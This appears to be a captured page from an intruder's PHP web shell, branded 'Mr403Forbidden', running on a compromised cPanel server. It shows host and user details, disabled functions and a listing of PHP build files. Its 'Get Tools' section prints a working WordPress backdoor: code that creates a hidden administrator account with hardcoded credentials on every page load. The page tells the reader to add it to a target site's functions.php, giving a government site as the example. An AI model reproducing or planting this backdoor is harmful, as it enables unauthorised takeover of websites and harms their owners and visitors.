./Mr403Forbidden

:/opt/cpanel/ea-php82/root/usr/lib64/php/build/ [ drwxr-xr-x ]

System: Linux 94.45.167.72.host.secureserver.net 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
Software: Apache
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 172.67.145.68
Your IP: 216.73.216.150
User: godevadmin (1035) | Group: godevadmin (1013)
Safe Mode: OFF
MYSQL: OFF | PERL: OFF | PYTHON: OFF | WGET: OFF | CURL: ON | GCC: OFF | PKEXEC: OFF
Disable Function:
exec,passthru,shell_exec,system

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = '[email protected]';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
Makefile.global file 2026-04-21 21:16 7 KB root/root -rw-r--r--
ax_check_compile_flag.m4 file 2026-04-21 21:16 2.05 KB root/root -rw-r--r--
ax_gcc_func_attribute.m4 file 2026-04-21 21:16 8.21 KB root/root -rw-r--r--
config.guess file 2026-04-21 21:16 48.19 KB root/root -rwxr-xr-x
config.sub file 2026-04-21 21:16 34.45 KB root/root -rwxr-xr-x
gen_stub.php file 2026-04-21 21:16 163.3 KB root/root -rw-r--r--
libtool.m4 file 2026-04-21 21:16 323.83 KB root/root -rw-r--r--
ltmain.sh file 2026-04-21 21:16 316.55 KB root/root -rw-r--r--
php.m4 file 2026-04-21 21:16 71.24 KB root/root -rw-r--r--
php_cxx_compile_stdcxx.m4 file 2026-04-21 21:16 18.19 KB root/root -rw-r--r--
phpize.m4 file 2026-04-21 21:16 5.08 KB root/root -rw-r--r--
pkg.m4 file 2026-04-21 21:16 10.01 KB root/root -rw-r--r--
run-tests.php file 2026-04-21 21:16 135.87 KB root/root -rw-r--r--
shtool file 2026-04-21 21:16 64.22 KB root/root -rwxr-xr-x

© ./Mr403Forbidden